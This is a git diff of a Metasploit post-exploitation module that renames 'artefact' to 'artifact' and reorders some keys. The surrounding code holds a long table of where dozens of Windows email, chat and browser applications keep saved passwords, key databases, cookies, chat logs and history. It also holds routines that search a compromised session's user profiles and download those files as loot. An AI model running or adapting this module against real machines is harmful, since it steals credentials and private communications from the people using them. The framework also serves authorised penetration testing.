       :filetypes => "email_logs",
       :path => 'LocalAppData',
       :dir => 'IM',
-      :artefact=> "msg.iml",
+      :artifact=> "msg.iml",
       :description => "IncrediMail's sent and received emails"},
     ## Outlook
     {
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "deleted_emails",
       :path => 'LocalAppData',
       :dir => 'Identities',
-      :artefact=> "Deleted Items.dbx",
+      :artifact=> "Deleted Items.dbx",
       :description => "Outlook's Deleted emails"},
     {
       :category => "emails",
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "draft_emails",
       :path => 'LocalAppData',
       :dir => 'Identities',
-      :artefact=> "Drafts.dbx",
+      :artifact=> "Drafts.dbx",
       :description => "Outlook's unsent emails"},
     {
       :application=> 'outlook',
@@ -82,7 +82,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "email_logs",
       :path => 'LocalAppData',
       :dir => 'Identities',
-      :artefact=> "Folders.dbx",
+      :artifact=> "Folders.dbx",
       :description => "Outlook's Folders"},
     {
       :application=> 'outlook',
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "received_emails",
       :path => 'LocalAppData',
       :dir => 'Identities',
-      :artefact=> "Inbox.dbx",
+      :artifact=> "Inbox.dbx",
       :description => "Outlook's received emails"},
     {
       :application=> 'outlook',
@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "email_logs",
       :path => 'LocalAppData',
       :dir => 'Identities',
-      :artefact=> "Offline.dbx",
+      :artifact=> "Offline.dbx",
       :description => "Outlook's offline emails"},
     {
       :category => "emails",
@@ -106,7 +106,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "email_logs",
       :path => 'LocalAppData',
       :dir => 'Identities',
-      :artefact=> "Outbox.dbx",
+      :artifact=> "Outbox.dbx",
       :description => "Outlook's sent emails"},
     {
       :application=> 'outlook',
@@ -114,7 +114,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "sent_emails",
       :path => 'LocalAppData',
       :dir => 'Identities',
-      :artefact=> "Sent Items.dbx",
+      :artifact=> "Sent Items.dbx",
       :description => "Outlook's sent emails"},
     ## Opera Mail
     {
@@ -123,7 +123,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => 'Opera Mail',
-      :artefact=> "wand.dat",
+      :artifact=> "wand.dat",
       :description => "Opera-Mail's saved Username & Passwords"},
     {
       :application=> 'operamail',
@@ -131,7 +131,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "email_logs",
       :path => 'LocalAppData',
       :dir => 'Opera Mail',
-      :artefact=> "*.mbs",
+      :artifact=> "*.mbs",
       :description => "Opera-Mail's emails"},
     ## PostBox Mail
     {
@@ -140,7 +140,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "received_emails",
       :path => 'AppData',
       :dir => 'Postbox',
-      :artefact=> "INBOX",
+      :artifact=> "INBOX",
       :description => "Postbox's sent and received emails"},
     {
       :application=> 'postbox',
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "sent_emails",
       :path => 'AppData',
       :dir => 'Postbox',
-      :artefact=> "Sent*",
+      :artifact=> "Sent*",
       :description => "Postbox's sent and received emails"},
     {
       :application=> 'postbox',
@@ -156,7 +156,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "email_logs",
       :path => 'AppData',
       :dir => 'Postbox',
-      :artefact=> "*.msf",
+      :artifact=> "*.msf",
       :description => "Postbox's sent and received emails"},
     {
       :category => "emails",
@@ -164,7 +164,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "email_logs",
       :path => 'AppData',
       :dir => 'Postbox',
-      :artefact=> "Archive.msf",
+      :artifact=> "Archive.msf",
       :description => "Postbox's sent and received emails"},
     {
       :application=> 'postbox',
@@ -172,7 +172,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "email_logs",
       :path => 'AppData',
       :dir => 'Postbox',
-      :artefact=> "Bulk Mail.msf",
+      :artifact=> "Bulk Mail.msf",
       :description => "Postbox's junk emails"},
     {
       :category => "emails",
@@ -180,7 +180,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "draft_emails",
       :path => 'AppData',
       :dir => 'Postbox',
-      :artefact=> "Draft.msf",
+      :artifact=> "Draft.msf",
       :description => "Postbox's unsent emails"},
     {
       :application=> 'postbox',
@@ -188,7 +188,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "received_emails",
       :path => 'AppData',
       :dir => 'Postbox',
-      :artefact=> "INBOX.msf",
+      :artifact=> "INBOX.msf",
       :description => "Postbox's received emails"},
     {
       :application=> 'postbox',
@@ -196,7 +196,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "sent_emails",
       :path => 'AppData',
       :dir => 'Postbox',
-      :artefact=> "Sent*.msf",
+      :artifact=> "Sent*.msf",
       :description => "Postbox's sent emails"},
     {
       :application=> 'postbox',
@@ -204,7 +204,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "sent_emails",
       :path => 'AppData',
       :dir => 'Postbox',
-      :artefact=> "Sent.msf",
+      :artifact=> "Sent.msf",
       :description => "Postbox's sent emails"},
     {
       :application=> 'postbox',
@@ -212,7 +212,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "email_logs",
       :path => 'AppData',
       :dir => 'Postbox',
-      :artefact=> "Templates.msf",
+      :artifact=> "Templates.msf",
       :description => "Postbox's template emails"},
     {
       :application=> 'postbox',
@@ -220,7 +220,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "deleted_emails",
       :path => 'AppData',
       :dir => 'Postbox',
-      :artefact=> "Trash.msf",
+      :artifact=> "Trash.msf",
       :description => "Postbox's Deleted emails"},
     ## Mozilla Thunderbird Mail
     {
@@ -229,7 +229,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => 'Thunderbird',
-      :artefact=> "signons.sqlite",
+      :artifact=> "signons.sqlite",
       :description => "Thunderbird's saved Username & Passwords"},
     {
       :application=> 'thunderbird',
@@ -237,7 +237,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => 'Thunderbird',
-      :artefact=> "key3.db",
+      :artifact=> "key3.db",
       :description => "Thunderbird's saved Username & Passwords"},
     {
       :application=> 'thunderbird',
@@ -245,7 +245,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => 'Thunderbird',
-      :artefact=> "cert8.db",
+      :artifact=> "cert8.db",
       :description => "Thunderbird's saved Username & Passwords"},
     {
       :application=> 'thunderbird',
@@ -253,7 +253,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "received_emails",
       :path => 'AppData',
       :dir => 'Thunderbird',
-      :artefact=> "Inbox",
+      :artifact=> "Inbox",
       :description => "Thunderbird's received emails"},
     {
       :application=> 'thunderbird',
@@ -261,7 +261,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "sent_emails",
       :path => 'AppData',
       :dir => 'Thunderbird',
-      :artefact=> "Sent",
+      :artifact=> "Sent",
       :description => "Thunderbird's Send emails"},
     {
       :category => "emails",
@@ -269,7 +269,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "deleted_emails",
       :path => 'AppData',
       :dir => 'Thunderbird',
-      :artefact=> "Trash",
+      :artifact=> "Trash",
       :description => "Thunderbird's Deleted emails"},
     {
       :application=> 'thunderbird',
@@ -277,7 +277,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "draft_emails",
       :path => 'AppData',
       :dir => 'Thunderbird',
-      :artefact=> "Drafts",
+      :artifact=> "Drafts",
       :description => "Thunderbird's unsent emails"},
     {
       :category => "emails",
@@ -285,7 +285,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "database",
       :path => 'AppData',
       :dir => 'Thunderbird',
-      :artefact=> "global-messages-db.sqlite",
+      :artifact=> "global-messages-db.sqlite",
       :description => "emails info"},
     ## Windows Live Mail
     {
@@ -294,7 +294,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => 'Microsoft',
-      :artefact=> "*.oeaccount",
+      :artifact=> "*.oeaccount",
       :description => "Windows Live Mail's saved Username & Password"},
     # Instant Messaging chats applications  x 13
     ## AIM (Aol Instant Messaging)
@@ -304,7 +304,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'LocalAppData',
       :dir => 'AIM',
-      :artefact=> "aimx.bin",
+      :artifact=> "aimx.bin",
       :description => "AIM's saved Username & Passwords"},
     {
       :application=> 'AIM',
@@ -312,7 +312,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "chat_logs",
       :path => 'LocalAppData',
       :dir => 'AIM',
-      :artefact=> "*.html",
+      :artifact=> "*.html",
       :description => "AIM's chat logs with date and times"},
     ## Digsby is multi-protocol Instant Messaging client which lets the user to comunicate with all friends from many applications of other IM chat application such as AIM, MSN, Yahoo, ICQ, Google Talk,
     {
@@ -321,7 +321,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'LocalAppData',
       :dir => 'Digsby',
-      :artefact=> "logininfo.yaml",
+      :artifact=> "logininfo.yaml",
       :description => "Digsby's saved Username & Passwords"},
     ## GaduGadu, popular Polish chat (Poland country)
     {
@@ -330,7 +330,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "chat_logs",
       :path => 'GG dysk',
       :dir => 'Galeria',
-      :artefact=> "Thumbs.db",
+      :artifact=> "Thumbs.db",
       :description => "Saved Gadu Gadu User Profile Images in Thumbs.db file"},
     {
       :application=> 'gadugadu',
@@ -338,8 +338,8 @@ class Metasploit3 < Msf::Post
       :filetypes => "chat_logs",
       :path => 'AppData',
       :dir => 'GG',
-      :artefact=> "profile.ini",
-      :description => "GaduGadu profile User information : Rename long saved artefactto in profile.ini"},
+      :artifact=> "profile.ini",
+      :description => "GaduGadu profile User information : Rename long saved artifactto in profile.ini"},
     ## ICQ chat is used for messaging, video and voice calls
     {
       :application=> 'ICQ',
@@ -347,7 +347,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => 'ICQ',
-      :artefact=> "Owner.mdb",
+      :artifact=> "Owner.mdb",
       :description => "ICQ's saved Username & Passwords"},
     {
       :application=> 'ICQ',
@@ -355,7 +355,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "chat_logs",
       :path => 'AppData',
       :dir => 'ICQ',
-      :artefact=> "Messages.mdb",
+      :artifact=> "Messages.mdb",
       :description => "ICQ's chat logs"},
     ## Miranda is a multi protocol instant messaging client, protocols such as AIM (AOL Instant Messenger), Gadu-Gadu, ICQ, Tlen and others.
     {
@@ -364,7 +364,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => 'Miranda',
-      :artefact=> "Home.dat",
+      :artifact=> "Home.dat",
       :description => "Miranda's multi saved chat protocol Username, (coded Passwords"},
     ## Nimbuzz
     {
@@ -373,7 +373,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => 'nimbuzz',
-      :artefact=> "nimbuzz.log",
+      :artifact=> "nimbuzz.log",
       :description => "Username&Password - user phone number "},
     ## Pidgen Pidgin is an easy to use and free chat client used by millions. Connect to AIM, MSN, Yahoo, and others
     {
@@ -382,7 +382,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => '.purple',
-      :artefact=> "accounts.xml",
+      :artifact=> "accounts.xml",
       :description => "Pidgen's saved Username & Passwords"},
     {
       :application=> 'pidgen',
@@ -390,7 +390,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "chat_logs",
       :path => 'AppData',
       :dir => '.purple',
-      :artefact=> "*.html",
+      :artifact=> "*.html",
       :description => "Pidgen's chat logs"},
     ## QQ International is a Chinese online communication instant messagins with 750+ million existing users.
     {
@@ -399,7 +399,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "chat_logs",
       :path => 'AppData',
       :dir => "Tencent",
-      :artefact=> "UserHeadTemp*",
+      :artifact=> "UserHeadTemp*",
       :description => "QQ's Profile Image"},
     ## Skype
     {
@@ -408,7 +408,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => 'Skype',
-      :artefact=> "main.db",
+      :artifact=> "main.db",
       :description => "Skype's 's saved Username & Passwords"},
     ## Tango - Texts and videos chat for mobiles and PCs
     {
@@ -417,7 +417,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "database",
       :path => 'LocalAppData',
       :dir => 'tango',
-      :artefact=> "contacts.dat",
+      :artifact=> "contacts.dat",
       :description => "All Contact's name "},
     {
       :application=> 'tango',
@@ -425,7 +425,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "software_version",
       :path => 'LocalAppData',
       :dir => 'tango',
-      :artefact=> "install.log",
+      :artifact=> "install.log",
       :description => "Tango Version "},
     ## Tlen.pl is an adware licensed Polish instant messaging service. It is fully compatible with Gadu-Gadu instant messenger.
     {
@@ -434,7 +434,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => 'Tlen.pl',
-      :artefact=> "Profiles.dat",
+      :artifact=> "Profiles.dat",
       :description => "Tlen.pl's saved Username & Passwords"},
     {
       :application=> 'tlen.pl',
@@ -442,7 +442,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "chat_logs",
       :path => 'AppData',
       :dir => 'Tlen.pl',
-      :artefact=> "*.jpg",
+      :artifact=> "*.jpg",
       :description => "Tlen.pl sent Images"},
     ## Trillian multi-protocol such as  AIM, ICQ.
     {
@@ -451,7 +451,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => 'Trillian',
-      :artefact=> "accounts.ini",
+      :artifact=> "accounts.ini",
       :description => "Trillian's saved Username & Passwords"},
     {
       :application=> 'trillian',
@@ -459,7 +459,7 @@ class Metasploit3 < Msf::Post
       :filetypes => 'chat_logs',
       :path => 'AppData',
       :dir => 'Trillian',
-      :artefact=> "*.log",
+      :artifact=> "*.log",
       :description => "Trillian logs; Open the file"},
     ## Viber - Texts and videos chat for mobiles and PCs
     {
@@ -468,7 +468,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "database",
       :path => 'AppData',
       :dir => 'ViberPC',
-      :artefact=> "viber.db",
+      :artifact=> "viber.db",
       :description => "All Contact's names, numbers, sms are saved from user's mobile"},
     {
       :application=> 'viber',
@@ -476,7 +476,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "thumbs",
       :path => 'AppData',
       :dir => 'ViberPC',
-      :artefact=> "Thumbs.db",
+      :artifact=> "Thumbs.db",
       :description => "Viber's Contact's profile images in Thumbs.db file"},
     {
       :application=> 'viber',
@@ -484,7 +484,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "images",
       :path => 'AppData',
       :dir => 'ViberPC',
-      :artefact=> "*.jpg",
+      :artifact=> "*.jpg",
       :description => "Collects all images of contacts and sent recieved"},
      ## xChat  is used also for
     {
@@ -493,7 +493,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "chat_logs",
       :path => 'AppData',
       :dir => 'X-Chat 2',
-      :artefact=> "*.txt",
+      :artifact=> "*.txt",
       :description => "Collects all chatting conversations of sent and recieved"},
     # Gaming  x1
     ## Xfire is popular for gaming
@@ -503,7 +503,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => 'Xfire',
-      :artefact=> "xfireUser.ini",
+      :artifact=> "xfireUser.ini",
       :description => "Xfire saved Username & Passwords"},
     {
       :application=> 'xfire',
@@ -511,7 +511,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppDataLocal',
       :dir => 'Xfire',
-      :artefact=> "xfireUser.ini",
+      :artifact=> "xfireUser.ini",
       :description => "Xfire saved Username & Passwords"},
     #Web Browsers applications x 13
     ## Avant
@@ -521,7 +521,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir =>'Avant Profiles',
-      :artefact=> "forms.dat",
+      :artifact=> "forms.dat",
       :description => "Avant's saved Username & Passwords"},
     ## Comodo
     {
@@ -530,7 +530,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'LocalAppData',
       :dir =>'COMODO',
-      :artefact=> "Login Data",
+      :artifact=> "Login Data",
       :description => "Comodo's saved Username & Passwords"},
     {
       :application=> "comodo",
@@ -538,7 +538,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "cookies",
       :path => 'LocalAppData',
       :dir =>'COMODO',
-      :artefact=> "Cookies",
+      :artifact=> "Cookies",
       :description => "Cookies"},
     {
       :application=> "comodo",
@@ -546,7 +546,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "web_history",
       :path => 'LocalAppData',
       :dir =>'COMODO',
-      :artefact=> "History",
+      :artifact=> "History",
       :description => "Comodo's History"},
     {
       :application=> "comodo",
@@ -554,7 +554,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "web_history",
       :path => 'LocalAppData',
       :dir =>'COMODO',
-      :artefact=> "Visited Links",
+      :artifact=> "Visited Links",
       :description => "Comodo's History"},
     ## CoolNovo
     {
@@ -563,7 +563,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'LocalAppData',
       :dir =>'MapleStudio',
-      :artefact=> "Login Data",
+      :artifact=> "Login Data",
       :description => "Comodo's saved Username & Passwords"},
     ## Chrome
     {
@@ -572,7 +572,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'LocalAppData',
       :dir => "Google",
-      :artefact=> "Login Data",
+      :artifact=> "Login Data",
       :description => "Chrome's saved Username & Passwords"},
     {
       :application=> "chrome",
@@ -580,7 +580,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "cookies",
       :path => 'LocalAppData',
       :dir => "Google",
-      :artefact=> "Cookies",
+      :artifact=> "Cookies",
       :description => "Chrome Cookies"},
     {
       :application=> "chrome",
@@ -588,7 +588,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "web_history",
       :path => 'LocalAppData',
       :dir => "Google",
-      :artefact=> "History",
+      :artifact=> "History",
       :description => "Chrome History"},
     ## FireFox
     {
@@ -597,7 +597,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => "Mozilla",
-      :artefact=> "logins.json",
+      :artifact=> "logins.json",
       :description => "Firefox's saved Username & Passwords "},
     {
       :application=> "firefox",
@@ -605,7 +605,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => "Mozilla",
-      :artefact=> "cert8.db",
+      :artifact=> "cert8.db",
       :description => "Firefox's saved Username & Passwords"},
     {
       :application=> "firefox",
@@ -613,7 +613,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => "Mozilla",
-      :artefact=> "key3.db",
+      :artifact=> "key3.db",
       :description => "Firefox's saved Username & Passwords"},
     {
       :application=> "firefox",
@@ -621,7 +621,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "web_history",
       :path => 'AppData',
       :dir => "Mozilla",
-      :artefact=> "places.sqlite",
+      :artifact=> "places.sqlite",
       :description => "FireFox History"},
     {
       :application=> "firefox",
@@ -629,7 +629,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "web_history",
       :path => 'AppData',
       :dir =>'Mozilla',
-      :artefact=> "formhistory.sqlite",
+      :artifact=> "formhistory.sqlite",
       :description => "FireFox's saved Username using sqlite tool"},
     {
       :application=> "firefox",
@@ -637,7 +637,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "cookies",
       :path => 'AppData',
       :dir => "Mozilla",
-      :artefact=> "cookies.sqlite",
+      :artifact=> "cookies.sqlite",
       :description => "Firefox's cookies"},
     ## Flock
     {
@@ -646,7 +646,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir =>'Flock',
-      :artefact=> "formhistory.sqlite",
+      :artifact=> "formhistory.sqlite",
       :description => "Flock's saved Username"},
     {
       :application=> "flock",
@@ -654,7 +654,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "web_history",
       :path => 'AppData',
       :dir =>'Flock',
-      :artefact=> "downloads.sqlite",
+      :artifact=> "downloads.sqlite",
       :description => "Flock's downloaded files"},
     {
       :application=> "flock",
@@ -662,7 +662,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "cookies",
       :path => 'AppData',
       :dir =>'Flock',
-      :artefact=> "cookies.sqlite",
+      :artifact=> "cookies.sqlite",
       :description => "Flock's Cookies file"},
     ## IE
     {
@@ -671,7 +671,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "web_history",
       :path => 'LocalSettings',
       :dir =>'History',
-      :artefact=> "index.dat",
+      :artifact=> "index.dat",
       :description => "IE's History"},
     ## K-Meleon
     {
@@ -680,7 +680,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => "K-Meleon",
-      :artefact=> "signons.sqlite",
+      :artifact=> "signons.sqlite",
       :description => "K-Meleon's saved Username & Passwords"},
     {
       :application=> "k-meleon",
@@ -688,7 +688,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => "K-Meleon",
-      :artefact=> "key3.db",
+      :artifact=> "key3.db",
       :description => "K-Meleon's saved Username & Passwords"},
     {
       :application=> "k-meleon",
@@ -696,7 +696,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => "K-Meleon",
-      :artefact=> "cert8.db",
+      :artifact=> "cert8.db",
       :description => "K-Meleon's saved Username & Passwords"},
     {
       :application=> "k-meleon",
@@ -704,7 +704,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "cookies",
       :path => 'AppData',
       :dir => "K-Meleon",
-      :artefact=> "cookies.sqlite",
+      :artifact=> "cookies.sqlite",
       :description => "K-Meleon's Cookies"},
     {
       :application=> "k-meleon",
@@ -712,7 +712,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "web_history",
       :path => 'AppData',
       :dir => "K-Meleon",
-      :artefact=> "formhistory.sqlite",
+      :artifact=> "formhistory.sqlite",
       :description => "K-Meleon's Visited websites history"},
     {
       :application=> "k-meleon",
@@ -720,7 +720,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "web_history",
       :path => 'AppData',
       :dir => "K-Meleon",
-      :artefact=> "places.sqlite",
+      :artifact=> "places.sqlite",
       :description => "K-Meleon's Visited websites history"},
     ## Maxthon
     {
@@ -729,7 +729,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => "Maxthon3",
-      :artefact=> "MagicFill2.dat",
+      :artifact=> "MagicFill2.dat",
       :description => "Maxthon's saved Username & Passwords"},
     ## Opera
     {
@@ -738,7 +738,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => "Opera Software",
-      :artefact=> "Login Data",
+      :artifact=> "Login Data",
       :description => "Opera's saved Username & Passwords"},
     {
       :application=> "opera",
@@ -746,7 +746,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "cookies",
       :path => 'AppData',
       :dir => "Opera Software",
-      :artefact=> "Cookies",
+      :artifact=> "Cookies",
       :description => "Opera Cookies"},
     {
       :application=> "opera",
@@ -754,7 +754,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "web_history",
       :path => 'AppData',
       :dir => "Opera Software",
-      :artefact=> "Visited Links",
+      :artifact=> "Visited Links",
       :description => "Opera Visited Links"},
     ## SRware
     {
@@ -763,7 +763,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'LocalAppData',
       :dir => "Chromium",
-      :artefact=> "Login Data",
+      :artifact=> "Login Data",
       :description => "SRware's saved Username & Passwords"},
     {
       :application=> "srware",
@@ -771,7 +771,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "web_history",
       :path => 'LocalAppData',
       :dir => "Chromium",
-      :artefact=> "Cookies",
+      :artifact=> "Cookies",
       :description => "SRware's Cookies"},
     {
       :application=> "srware",
@@ -779,7 +779,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "web_history",
       :path => 'LocalAppData',
       :dir => "Chromium",
-      :artefact=> "History",
+      :artifact=> "History",
       :description => "SRware's Visited websites history"},
     ## Safari
     {
@@ -788,7 +788,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => "Apple Computer",
-      :artefact=> "keychain.plist",
+      :artifact=> "keychain.plist",
       :description => "Safari History"},
     ## SeaMonkey
     {
@@ -797,7 +797,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => "Mozilla",
-      :artefact=> "logins.json",
+      :artifact=> "logins.json",
       :description => "SeaMonkey's saved Username & Passwords"},
     {
       :application=> "seamonkey",
@@ -805,7 +805,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => "Mozilla",
-      :artefact=> "cert8.db",
+      :artifact=> "cert8.db",
       :description => "SeaMonkey's saved Username & Passwords"},
     {
       :application=> "seamonkey",
@@ -813,7 +813,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "logins",
       :path => 'AppData',
       :dir => "Mozilla",
-      :artefact=> "key3.db",
+      :artifact=> "key3.db",
       :description => "SeaMonkey's saved Username & Passwords"},
     {
       :application=> "seamonkey",
@@ -821,7 +821,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "web_history",
       :path => 'AppData',
       :dir =>'Mozilla',
-      :artefact=> "formhistory.sqlite",
+      :artifact=> "formhistory.sqlite",
       :description => "SeaMonkey's saved Username"},
     {
       :application=> "seamonkey",
@@ -829,7 +829,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "web_history",
       :path => 'AppData',
       :dir => "Mozilla",
-      :artefact=> "places.sqlite",
+      :artifact=> "places.sqlite",
       :description => "SeaMonkey History"},
     {
       :application=> "seamonkey",
@@ -837,7 +837,7 @@ class Metasploit3 < Msf::Post
       :filetypes => "cookies",
       :path => 'AppData',
       :dir => "Mozilla",
-      :artefact=> "cookies.sqlite",
+      :artifact=> "cookies.sqlite",
       :description => "SeaMonkey's cookies"}
   ]
   @@success_count = 0
@@ -854,7 +854,7 @@ class Metasploit3 < Msf::Post
     grab_user_profiles.each do |userprofile|
       @@apps.each { |f| downloading(userprofile, f) }
     end
-    print_status("Downloaded #{@@success_count} artefact(s), attempted #{@@try_count}.\n")
+    print_status("Downloaded #{@@success_count} artifact(s), attempted #{@@try_count}.\n")
   end
 
   # Check to see if the artifact exists on the remote system.
@@ -869,47 +869,47 @@ class Metasploit3 < Msf::Post
   def downloading(profile, opts={})
     cat = opts[:category]
     app = opts[:application]
-    artefact = opts[:artefact]
+    artifact = opts[:artifact]
     ft = opts[:filetypes]
     dir = opts[:dir]
     path = opts[:path]
 
     # filter based on options
     if (cat != datastore['APPCATEGORY'] && datastore['APPCATEGORY'] != 'All') || (app != datastore['APPLICATION'] && datastore['APPLICATION'] != 'All') || (ft != datastore['ARTEFACTS'] && datastore['ARTEFACTS'] != 'All')
-      # doesn't match search criteria, skip this artefact
+      # doesn't match search criteria, skip this artifact
       return false
     end
 
     @@try_count += 1
-    print_status("Searching for #{app.capitalize}'s #{artefact.capitalize} files in #{profile['UserName']}'s user directory...")
+    print_status("Searching for #{app.capitalize}'s #{artifact.capitalize} files in #{profile['UserName']}'s user directory...")
     # check if file exists in user's directory on the remote computer.
     if location(profile, opts)
-      print_status("#{app.capitalize}'s #{artefact.capitalize} file found")
+      print_status("#{app.capitalize}'s #{artifact.capitalize} file found")
     else
-      print_error("#{app.capitalize}'s #{artefact.capitalize} not found in #{profile['UserName']}'s user directory\n")
+      print_error("#{app.capitalize}'s #{artifact.capitalize} not found in #{profile['UserName']}'s user directory\n")
       # skip non-existing file
       return false
     end
 
     # read from app array above
-    artefact = opts[:artefact]
+    artifact = opts[:artifact]
     dir = opts[:dir]
     path = opts[:path]
     description = opts[:description]
     file_dir = "#{profile[path]}\\#{dir}"
-    file = session.fs.file.search(file_dir, "#{artefact}", true)
+    file = session.fs.file.search(file_dir, "#{artifact}", true)
     # additional check for file
     return false unless file
 
     file.each do |db|
       # split path for each directory
       guid = db['path'].split('\\')
-      local_loc = "#{guid.last}#{artefact}"
-      saving_path = store_loot("#{app}#{artefact}", "", session, "", local_loc)
+      local_loc = "#{guid.last}#{artifact}"
+      saving_path = store_loot("#{app}#{artifact}", "", session, "", local_loc)
       maindb = "#{db['path']}#{session.fs.file.separator}#{db['name']}"
       print_status("Downloading #{maindb}")
       session.fs.file.download_file(saving_path, maindb)
-      print_status("#{app.capitalize} #{artefact.capitalize} downloaded (#{description})")
+      print_status("#{app.capitalize} #{artifact.capitalize} downloaded (#{description})")
       print_good("File saved to #{saving_path}\n")
       @@success_count += 1
     end

--- a/modules/post/windows/gather/enum_application_artifacts_packrat.rb
+++ b/modules/post/windows/gather/enum_application_artifacts_packrat.rb
@@ -69,8 +69,8 @@ class Metasploit3 < Msf::Post
       :artifact=> "Deleted Items.dbx",
       :description => "Outlook's Deleted emails"},
     {
-      :category => "emails",
       :application=> 'outlook',
+      :category => "emails",
       :filetypes => "draft_emails",
       :path => 'LocalAppData',
       :dir => 'Identities',
@@ -101,8 +101,8 @@ class Metasploit3 < Msf::Post
       :artifact=> "Offline.dbx",
       :description => "Outlook's offline emails"},
     {
-      :category => "emails",
       :application=> 'outlook',
+      :category => "emails",
       :filetypes => "email_logs",
       :path => 'LocalAppData',
       :dir => 'Identities',
@@ -118,8 +118,8 @@ class Metasploit3 < Msf::Post
